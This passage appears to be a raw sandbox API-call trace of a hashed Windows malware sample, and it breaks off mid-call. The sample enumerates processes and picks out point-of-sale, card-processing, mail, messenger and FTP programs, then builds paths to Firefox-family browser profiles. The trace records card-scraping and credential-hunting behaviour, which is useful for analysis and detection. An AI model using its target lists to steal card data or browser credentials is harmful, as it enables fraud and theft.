cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0108.873] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1020, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0108.874] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0108.875] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0108.876] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0108.878] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0108.879] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0108.880] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0108.881] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1084, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0108.883] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0108.884] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0108.885] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0108.886] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0108.887] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0108.888] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0108.890] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0108.891] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0108.892] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0108.893] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1100, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0108.894] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0108.895] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x111c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0108.896] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0108.897] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0108.898] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0108.900] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0108.901] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0108.902] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0108.903] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0108.905] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0108.906] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0108.907] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0108.908] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0108.909] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0108.910] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0108.911] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0108.912] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0108.913] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0108.914] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0108.915] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.916] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0108.917] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0108.918] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.919] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.920] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 1 [0108.921] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.922] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0108.922] CloseHandle (hObject=0x358) returned 1 [0108.923] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0108.923] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a1428 [0108.923] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0108.929] Process32First (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.931] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.932] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.933] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.934] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.936] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.937] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.938] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.939] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.939] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.941] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.941] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.942] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.943] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.944] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.945] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.946] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.947] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.947] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.948] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.949] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0108.950] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.951] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.952] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0108.952] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.953] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0109.012] CloseHandle (hObject=0x358) returned 1 [0109.012] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.012] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f340 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.017] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0109.017] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0109.017] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini" [0109.017] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 0xffffffff [0109.017] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f338 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.017] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Moonchild Productions\\Pale Moon\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" [0109.017] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" [0109.017] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini" [0109.017] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\moonchild productions\\pale moon\\profiles.ini")) returned 0xffffffff [0109.017] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f330 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.018] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Waterfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" [0109.018] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\") 